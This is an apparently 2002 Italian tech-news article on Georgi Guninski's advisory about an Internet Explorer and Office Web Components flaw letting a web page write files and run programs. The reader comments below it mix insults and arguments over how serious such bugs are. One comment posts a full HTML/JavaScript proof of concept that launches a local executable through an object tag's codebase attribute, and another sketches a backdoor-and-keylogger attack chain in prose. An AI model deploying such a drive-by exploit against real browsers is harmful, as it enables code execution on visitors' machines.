Guninski svela nuovi bachi in IE e Office

Il celebre bug hunter bulgaro sostiene che IE e Office, con condimento di ActiveX, sono ancora afflitti da problemi di sicurezza legati a vecchie vulnerabilitÓ

Roma - L'ormai popolare cacciatore di bachi Georgi Guninski torna all'attacco e, attraverso un nuovo advisory, denuncia una nuova falla di sicurezza che coinvolge Internet Explorer e Office. L'esperto sostiene che "se un utente di IE visita una pagina Web costruita in un certo modo, la pagina potrebbe creare quasi ogni tipo di file sul suo computer" e consentire ad un aggressore di eseguire un programma a sua scelta sul sistema dell'utente.

A quanto pare il problema descritto da Guninski Ŕ direttamente collegato ad una vulnerabilitÓ scoperta diversi mesi fa dallo stesso esperto di sicurezza in un componente di Office chiamato Office Web Components (OWC). Secondo il bug hunter bulgaro, una delle funzioni offerte da questo componente contiene un baco che pu˛ essere sfruttato attraverso IE ed Excel per creare file sul computer della vittima.

Sebbene Microsoft nel recente passato abbia rilasciato una patch relativa alla suddetta vulnerabilitÓ, Guninski sostiene che in realtÓ il problema sarebbe stato risolto solo parzialmente. Egli afferma infatti che Ŕ ancora possibile creare un file con estensione ".xls" o ".xla" capace a sua volta di scrivere file sul disco per mezzo del componente OWC. Il file in questione, precisa Guninski, potrebbe anche essere un file HTML con estensione ".xla".
Un altro problema, questa volta legato ad una vulnerabilitÓ descritta da Guninski in un advisory che risale addirittura al 2000, riguarda la possibilitÓ di passare a IE il comando <object data="file.xla"></object> che, sebbene non visibile, fa eseguire a Excel il file ".xla": questo potrebbe essere fatto in modo da sfruttare la vulnerabilitÓ citata in precedenza e, per mezzo del componente OWC, salvare il file sul disco dell'utente.

"Cosý lo strano schema di ActiveX - scrive Guninski - Ŕ come questo: IE -> Excel -> OWC -> Excel -> SaveAs()".

In attesa che Microsoft analizzi ed eventualmente risolva questi nuovi problemi, Guninski suggerisce di disabilitare i controlli ActiveX dalle impostazioni avanzate di IE o di disinstallare il componente OWC attraverso il setup di Office.
TAG: microsoft
28 Commenti alla Notizia Guninski svela nuovi bachi in IE e Office
Ordina
  • Provate tramite Internet Explorer (io uso quello di XP) a collegarvi ad un sito in ftp che richiede nome utente e password. Sulla barra del browser comparirà qualcosa del tipo ftp://user@xxx.com/yyy/zzz. Bene ora visualizzatene un anteprima di stampa, oppure stampatelo, in chiaro nell'angolo in basso a sinistra comparirà ftp://user:password@xxx.com/yyy/zzz... alla faccia della privacy e della connessione sicura
    non+autenticato

  • > ftp://user:password@xxx.com/yyy/zzz... alla
    > faccia della privacy e della connessione
    > sicura

    connessione sicura in ftp ??
    sei sicuro di quello che dici?

    ciao
    non+autenticato
  • mi ma se siete utonti continuate ad esserlo, non e una cosa brutta win vi permette anche questo basta che vi ricordate ogni tanto di lanciate windows update (questo e il bello di win), ed il gioco e fatto.

    non lanciatevi in lavori che non fanno per voi
    non+autenticato
  • Non mi sembra il commento appropriato in quanto ritengo di essere un esperto (e non solo di windows). Tanto per rispondere anche a maks: mai sentito parlare di FTP over SSH2 o di SFTP?

    E comunque, forse non mi sono espreso io correttamente, intendevo dire che non mi sembra corretto poter visualizzare/stampare anche la password con cui mi sono connesso ad un sito ftp.

    Bye
    non+autenticato

  • > E comunque, forse non mi sono espreso io
    > correttamente, intendevo dire che non mi
    > sembra corretto poter visualizzare/stampare
    > anche la password con cui mi sono connesso
    > ad un sito ftp.
    >

    a parte che usare internet explorer per l'ftp e' da masochisti...
    se faccio il mirror di un sito ftp con wget la password sta li bella in chiaro sulla console...
    non c'e' troppo da scandalizzarsi per queste cose...

    ciao
    non+autenticato

  • onto

    - Scritto da: Neo
    > Non mi sembra il commento appropriato in
    > quanto ritengo di essere un esperto (e non
    > solo di windows). Tanto per rispondere anche
    > a maks: mai sentito parlare di FTP over SSH2
    > o di SFTP?
    >
    > E comunque, forse non mi sono espreso io
    > correttamente, intendevo dire che non mi
    > sembra corretto poter visualizzare/stampare
    > anche la password con cui mi sono connesso
    > ad un sito ftp.
    >
    > Bye

    si ma qui si sta parlando di ie che centra l'ftp.

    e gli utonti continuano, come si riconosce un utonto sempllice quando metti in dubbio le sue conoscenze sbandiera di essere un esperto comincia a parlare per acronimi sftprut ciccotfg ecc...

    e confermato sei un utonto
    non+autenticato
  • IE è anche un client FTP da quel che so.
    Usarlo non è il massimo ma fa anche quello.
    non+autenticato
  • vabbè, lasciamo stare, parlare con "bambini" che probabilmente non hanno mai visto un sistema differente da windows lascia il tempo che trova...
    non+autenticato
  • Mi sa che l'ignorante sei tu.
    IE è nche un client FTP e puoi lanciare Windows update finchè vuoi che la password (per ragioni oscure che potrai conoscere solo studiando TCP/IP) si vedrà sempre.
    Questo NON E' un bug ma un comportamento normalissimo.
    non+autenticato
  • E' il colmo che non sia ancora stato patchato questo bug di IE, che esegue qualsiasi comando sul computer dell'utente.... (nell'esempio "c:/windows/system32/calc.exe")

    <html>
    <body>

    <object id="dataObject" type="text/html" data="empty.html" style="width:1px;left:-10000px">
    </object>

    <script type="text/javascript">
    var ref = document.getElementById("dataObject").object;

    function ExecuteFile(){
    ref.location.href = "file://c:/fdbfd" + (new Date()).getTime();
    setTimeout("CheckFile()",1000);
    }

    function CheckFile(){
    var sHTML = HtmlInput.value.replace(/\$WHATFILE\$/, "c:/windows/system32/calc.exe" );
    ref.body.insertAdjacentHTML( "beforeEnd" , sHTML );
    }

    ExecuteFile()

    </script>
    <textarea id=HtmlInput style="display:none" name="textarea">
    <object classid="clsid:11111111-1111-1111-1111-111111111111" codebase="$WHATFILE$"></object>
    </textarea>


    </body>
    </html>
    non+autenticato
  • che cattivoni quelli della microsoft non ti paccano er buccone, un craccor te potrebbe ciccar la macchinina non pianser, ora papa bello te consola.

    a utonto ma che vai in giro per internet con le protezioni a zero sugli activex bravo bravo, invece di scrivere pirlate, spreca quarche secondo e alza la protezione vedrai che nessun cracco te insidia la macchina aprendo calc.exe in automatico
    non+autenticato
  • Senti imbecille, se tu non vuoi usare activex va bene, ma non vedo controindicazioni nel rendere pubblica una falla in modo che Micro$oft faccia una patch.
    Se non ti sta bene, me ne frego.
    Usa pure il tuo Lynx e tanti saluti.
    non+autenticato
  • Che tutti i bug, specialmente con ActiveX, java e javascript, c'è da aspettarsi di tutto
    non+autenticato
  • Java non direi anche perche' se non viene invocata la JVM un virus in java non puo' far niente (e non e' molto intelligente fare un virus che esegue un file.class invocando la JVM) e un applet java "infetta" o sfrutta bachi del browser o se ne sta' tranquilla.

    javascript e' un'altra cosa. Ma se non lo vuoi lopuoi disabilitare.
    ActiveX non so...

    - Scritto da: TheNinja
    > Che tutti i bug, specialmente con ActiveX,
    > java e javascript, c'è da aspettarsi di
    > tutto
    non+autenticato
  • si smentisce.

    applauso per l'utonto di turno ma se non sai un tubo perchè non evitate di postare idiozie, sfruttando appositi buchi della jvm si possono scrivere file sul disco locale, (ad esempio nella cartella esecuzione automatica e al prossimo avvio piallare la macchina dell'utonto ignaro)

    comunque già te lo detto in un altro post non scrivete se siete ignurant.

    - Scritto da: Volta&Gabbana
    > Java non direi anche perche' se non viene
    > invocata la JVM un virus in java non puo'
    > far niente (e non e' molto intelligente fare
    > un virus che esegue un file.class invocando
    > la JVM) e un applet java "infetta" o sfrutta
    > bachi del browser o se ne sta' tranquilla.
    >
    > javascript e' un'altra cosa. Ma se non lo
    > vuoi lopuoi disabilitare.
    > ActiveX non so...
    >
    > - Scritto da: TheNinja
    > > Che tutti i bug, specialmente con ActiveX,
    > > java e javascript, c'è da aspettarsi di
    > > tutto
    non+autenticato
  • Dimmi SOLO UN software che NON ha BUchi. O bachi che dir si voglia.
    Non ho mai scritto che sia sicura in assoluto ma secondo te in percentuale quanti sono i casi di sfruttamento dei bachi della JVM rispetto ad altri metodi, senz'altro piu' produttivi (dal punto di vista dell' Hacker ovviamente). Quanti casi si leggono di coinvolgimenti della JVM? quanti degli ActiveX O del Vbscript? Quanti del Javascript? E quanti qualli del S.O.?
    JAVA e'un linguaggio che non permette di accedere né tantomeno manipolare gli indirizzi dimemoria attraverso i puntatori.
    La stessa Java Virtual Machine si caratterizza per la presenza
    di un Security Manager che impone un controllo sulla legittimità
    dell'accesso alle risorse di sistema. La garanzia assoluta non esiste ma certamente non e' fra i migliori sistemi da sfruttare.
    E poi che io sappia tutti ipochi "buchi" noti (compreso quello che dici tu) della JVM sono stati corretti. Correggi piuttosto i BUCHI che hai in testa.


    non+autenticato
  • Nel terzultimo paragrafo:

    Un altro problema, questa volta legato ad una vulnerabilità descritta da Guninski in un advisory che risale addirittura al 2000, riguarda la possibilità di passare a IE il comando che, sebbene non visibile, fa eseguire a Excel il file ".xla"

    Manca questa parte:

    <object data="file.xla"></object>

    tra "il comando" e "che,"... ╚ stata scritta senza utilizzare i codici < e > per i tag html utilizzati...
    non+autenticato
  • Grazie!
    Abbiamo sistemato.
    Questi redattori d'agosto....Sorride))))
    non+autenticato
  • Se i bug che ogni volta vengono citati come "letali, feroci, pericolosi, ecc" fossero realmente tali, nessuno potrebbe lavorare con Office o Windows. Al di la dei moralismi su open e close, al di la degli odii personali, sappiamo che le cose non sono poi così gravi.

    Certo, "se qualcuno sfrutta.... ed entra..." sono parole che incutono timore ma si tratta di "se se se" e tali restano. Io penso (correggetemi se sbaglio) che i reali attacchi che procurano reali danni (valutabili monetariamente, intendo), siano creati con ben altri mezzi che non con i buchi di Office o IE.

    Mi vengono in mete tutti gli utilizzatori di mini-firewall (software) come Zone Alarm, che ci raccontano di incredibili attacchi alla loro macchina (da chi? per cosa? anche se fosse, cosa potrebbe accadere)?

    Anche io ero paranoiato poi mi sono un po' rotto le balle ed in effetti ho notato che è un po' come per i virus: i problemi si possono evitare tranquillamente. Non so cosa direbbe Zone alarm sulla mia sicurezza ma non ho bisogno che me lo dica luiSorride perchè non ho mai avuto alcun prob in tanti mesi/anni, pur visitando siti più o meno leciti ed usando software più o meno sicuri (file sharing, chat varie, ecc ecc).

    Se qualcuno vuole andare all'attacco e massacrarci il pc (client, server, workstation, ecc), lo farà con o senza bachetti di IE. Realmente parlando, questi buchi GRAVISSIMI che spuntano di tanto in tanto, quanti significativi danni hanno creato?

    Altrimenti andrebbero chiuse anche le autostrade: hanno un grosso bug riscontrabile nei weekend, non sono strade sicure, non impediscono gli incidenti (e siamo nel 2002). Idem treni, aerei, bla bla bla. Però si fa un rapporto danni/sopravvissuti. Se è un buon rapporto, si va avanti senza troppe paranoie.
    non+autenticato
  • > Certo, "se qualcuno sfrutta.... ed entra..."
    > sono parole che incutono timore ma si tratta
    > di "se se se" e tali restano.

    I bug vengono sfruttati eccome. Il fatto che non vengano sfruttati massivamente non significa che restino un-exploited. Non tutti i bug diventano così stranoti come il famoso Nuke sulla porta 139 (era comune subirne un attacco mentre si era tranquillamente in chat).

    Trascuri poi un particolare: questo è un bug che affligge Explorer e Excel, che tipicamente si trovano su macchine desktop e non server. Presumibilmente, quindi, l'exploit colpirà dei privati e non dei server e difficilmente ne sentirai parlare sui giornali, non trovi? La notizia dei singoli attacchi non avrà certo la stessa rilevanza di un attacco portato a termine su un grosso sito come Amazon.

    La pericolosità del bug è comunque elevata. Questo perchè difficilmente un attacker si limita ad applicare un singolo exploit: è normalissimo che un attacco si porti a termine in più passi, sfruttando più vulnerabilità e più bug. Semplicemente, questo è un ulteriore bug a disposizione.

    Tieni conto poi che si parla di esecuzione di codice arbitrario. Dov'è il pericolo? Esempio semplice semplice:

    - attacco, sfruttando questo bug, una macchina desktop di un'azienda

    - installo sulla macchina una brava backdoor

    - la backdoor mi permette di iniziare un attacco degli altri host della LAN, compresi i server: la backdoor mi permette di agire dall'interno della LAN (il che potrebbe essere il primo passo per saltare a piè pari il firewall..)

    [Sul giornale leggerai che la tale azienda ha perso i suoi dati per un attacco etc etc, e non credo che troverai le singole fasi dell'attacco; se l'attacker lavora bene, lascerà anche poche tracce; e il singolo bug di Explorer (che è stata una delle tanti fasi, apparentemente "innoqua") non sarà quello che fa' la notizia.]

    Oppure, ancora più semplicemente, installo un keylogger e mi chiappo tutte le password di quella macchina, e presumibilmente quelle degli altri servizi interni alla LAN, e perchè no?, quella dei servizi accessibili da internet. E da lì, via con altri attacchi.

    Oppure semplicemente, installo un virus o un trojan che fa' piazza pulita dell'hard disk dell'host e degli hard disk degli altri computer nella LAN.


    > Mi vengono in mete tutti gli utilizzatori di
    > mini-firewall (software) come Zone Alarm,
    > che ci raccontano di incredibili attacchi
    > alla loro macchina (da chi? per cosa? anche
    > se fosse, cosa potrebbe accadere)?


    ZoneAlarm non fa' testo. E soprattutto non fanno testo i suoi utilizzatori. Il tipico utilizzatore di ZoneAlarm non ha idea di cosa sia una demilitarized zone, si sente protetto ad installare un firewall sulla stessa macchina su cui lavora e su cui salva i dati e si spaventa quando ZoneAlarm gli segnala un ping di troppo, ignorando la differenza tra un hijacking e un synflood. Gli attacchi di cui raccontano sono il 99% delle volte dei ping sweep o poco più.

    > mesi/anni, pur visitando siti più o meno
    > leciti ed usando software più o meno sicuri
    > (file sharing, chat varie, ecc ecc).

    Esatto. Basta un minimo di background informatico per ottenere un'ottima protezione dagli attacchi più comuni: bastano davvero poche precauzioni semplicissime. Navigare sul WEB è pericoloso solo per chi scarica i .PIF e li lancia senza problemi.. O chi usa Explorer Occhiolino

    Diversissimo è il discorso della sicurezza di un server. Li', al contrario, è necessaria una grandissima competenza, una buona politica di manutenzione e tanto lavoro. Ma certo non si usa ZoneAlarmOcchiolino

    > Se qualcuno vuole andare all'attacco e
    > massacrarci il pc (client, server,
    > workstation, ecc), lo farà con o senza
    > bachetti di IE. Realmente parlando, questi
    > buchi GRAVISSIMI che spuntano di tanto in
    > tanto, quanti significativi danni hanno
    > creato?

    Ti ripeto, se parli di danni come l'abbuiamento di Yahoo.com o la cancellazione di tutte le caselle di Hotmail, credo che tu stia sottovalutando il fatto che gli attacchidi grandi dimensioni sono spesso anche complessi ma articolati in tanti piccoli passi. Avere a disposizione un "passo" in più che permette di eseguire codice arbitrario su una macchina è un passo *molto* *molto* sfruttabile per obiettivi ben più pericolosi.
    non+autenticato
  • eccellente commento... di nuovo mi scopro ad applaudirti, stai diventando il mio eroe!...
    non+autenticato
  • Grazie per il reply, in effetti la tua descrizione è sicuramente convincente. L'unica cosa che mi sento di dire è questa: a leggere PI, pare che il Pc su cui il 99% delle persone lavora... è un pericolo nazionale, un pericolo personale, un pericolo totale.

    Cosa che -secondo me- non è assolutamente vera. Ci sono dei bug e ci sono hacker in giro per la rete. L'equazione "bug = sicuro attacco = pericolosissimo" la trovo molto ma molto esagerata.
    non+autenticato


  • - Scritto da: ---
    > Grazie per il reply, in effetti la tua
    > descrizione è sicuramente convincente.
    > L'unica cosa che mi sento di dire è questa:
    > a leggere PI, pare che il Pc su cui il 99%
    > delle persone lavora... è un pericolo
    > nazionale, un pericolo personale, un
    > pericolo totale.


    Klez è diffuso su milioni di host, principalmente grazie a stranoti bug di Outlook. E come lui decine di altri virus. I danni provocati da virus e troiani si misurano in migliaia di miliardi. Ti pare poco?

    Lo so che ci siamo abituati, ma non è affatto normale dover acquistare un antivirus. Il problema è che ci siamo desensibilizzati, ma non è normale, non è per niente normale che compriamo software per parare i danni causati da big di altri software. E' un chiaro indice che la sicurezza è l'ultima delle priorità delle software house.

    > Cosa che -secondo me- non è assolutamente
    > vera. Ci sono dei bug e ci sono hacker in
    > giro per la rete. L'equazione "bug = sicuro
    > attacco = pericolosissimo" la trovo molto ma
    > molto esagerata.


    Dillo alle aziende che hanno perso miliardi (milirardi!) con il virus che sfruttava il bug di IIS....


    PS. Era il mio ultimo post... Parto, a fra 15 giorni! Buone vacanze a tutt Occhiolino
    non+autenticato
  • > Trascuri poi un particolare: questo è un bug
    > che affligge Explorer e Excel, che
    > tipicamente si trovano su macchine desktop e
    > non server. Presumibilmente, quindi,

    gli office web components non sono installati di default
    e servono solo lato server...
    non+autenticato
  • - Scritto da: Così
    > Se i bug che ogni volta vengono citati come
    > "letali, feroci, pericolosi, ecc" fossero
    > realmente tali, nessuno potrebbe lavorare
    > con Office o Windows. Al di la dei moralismi
    > su open e close, al di la degli odii
    > personali, sappiamo che le cose non sono poi
    > così gravi.
    >

    Se il fumo delle sigarette fosse così nocivo per la salute come tutti dicono, allora nessuno sarebbe realmente in grado di fumare.
    Al di la di filosofie puramente igeniste e non, sappiamo che le cose non sono così gravi.

    > Certo, "se qualcuno sfrutta.... ed entra..."
    > sono parole che incutono timore ma si tratta
    > di "se se se" e tali restano. Io penso
    > (correggetemi se sbaglio) che i reali
    > attacchi che procurano reali danni
    > (valutabili monetariamente, intendo), siano
    > creati con ben altri mezzi che non con i
    > buchi di Office o IE.
    >

    Certo, il "se mi becco un tumore" è una frase che incute timore, ma si trata pure sempre di un "se" e tale resta. Io penso (e correggetemi se sbaglio) che i danni più gravi ai nostri polmoni, dipendano da ben altri mezzi e non alle sole sigarette.

    > Mi vengono in mete tutti gli utilizzatori di
    > mini-firewall (software) come Zone Alarm,
    > che ci raccontano di incredibili attacchi
    > alla loro macchina (da chi? per cosa? anche
    > se fosse, cosa potrebbe accadere)?
    >

    Mi vengono in mente tutte quelle persone che fanno uso di cerotti alla nicotina, graffette all'orecchio e chissà cos'altro, per smettere di fumare, e che una volta riusciti ci raccontano di chissà quali mirabolanti imprese sportive che riescono a compiere senza avere il fiatone (e anche se fosse, a che pro mi domando? e io che fumo da 20 anni? che cosa mi dovrei perdere a non farmi 10 Km in bicicletta ogni mattina)

    > Anche io ero paranoiato poi mi sono un po'
    > rotto le balle ed in effetti ho notato che è
    > un po' come per i virus: i problemi si
    > possono evitare tranquillamente. Non so cosa
    > direbbe Zone alarm sulla mia sicurezza ma
    > non ho bisogno che me lo dica luiSorride perchè
    > non ho mai avuto alcun prob in tanti
    > mesi/anni, pur visitando siti più o meno
    > leciti ed usando software più o meno sicuri
    > (file sharing, chat varie, ecc ecc).
    >

    Anche io ero paranoiato poi mi sono un po' rotto le balle ed in effetti ho notato che è un po come l'alcool: i problemi si possono evitare tranquillamente. Non so cosa direbbe il mio dottore sullo stato di salute del mio cuore, ma in fin dei conti non ho bisogno che me lo dica luiOcchiolino dal momento che non ho mai avuto alcun problema alle coronarie in tutta la mia vita, pur fumando quasi un pacchetto di sigarette al giorno e non negandomi neanche tre o quattro birre medie il sabato sera.

    > Se qualcuno vuole andare all'attacco e
    > massacrarci il pc (client, server,
    > workstation, ecc), lo farà con o senza
    > bachetti di IE. Realmente parlando, questi
    > buchi GRAVISSIMI che spuntano di tanto in
    > tanto, quanti significativi danni hanno
    > creato?
    >

    Se qualcosa ha deciso che la nostra ora è giunta (ictus, infarto o quant'altro) ci toccherà comunque congedarci da questo mondo, indipendentemente dal fatto di fumare o no. Realmente parlando, questi allarmismi su malori GRAVISSIMI che spuntano di tanto in tanto, quante persone hanno realmente colpito?

    > Altrimenti andrebbero chiuse anche le
    > autostrade: hanno un grosso bug
    > riscontrabile nei weekend, non sono strade
    > sicure, non impediscono gli incidenti (e
    > siamo nel 2002). Idem treni, aerei, bla bla
    > bla. Però si fa un rapporto
    > danni/sopravvissuti. Se è un buon rapporto,
    > si va avanti senza troppe paranoie.

    (l'ultimo paragrafo lo riporto integralmente: sei un grande)

    Altrimenti andrebbero chiuse anche le autostrade: hanno un grosso bug riscontrabile nei weekend, non sono strade sicure, non impediscono gli incidenti (e siamo nel 2002). Idem treni, aerei, bla bla bla. Però si fa un rapporto danni/sopravvissuti. Se è un buon rapporto, si va avanti senza troppe paranoie.





    non+autenticato
  • buffone
    non+autenticato
  • buffone
    non+autenticato


  • - Scritto da: PorcoWeb
    > buffone

    sbruffone
    non+autenticato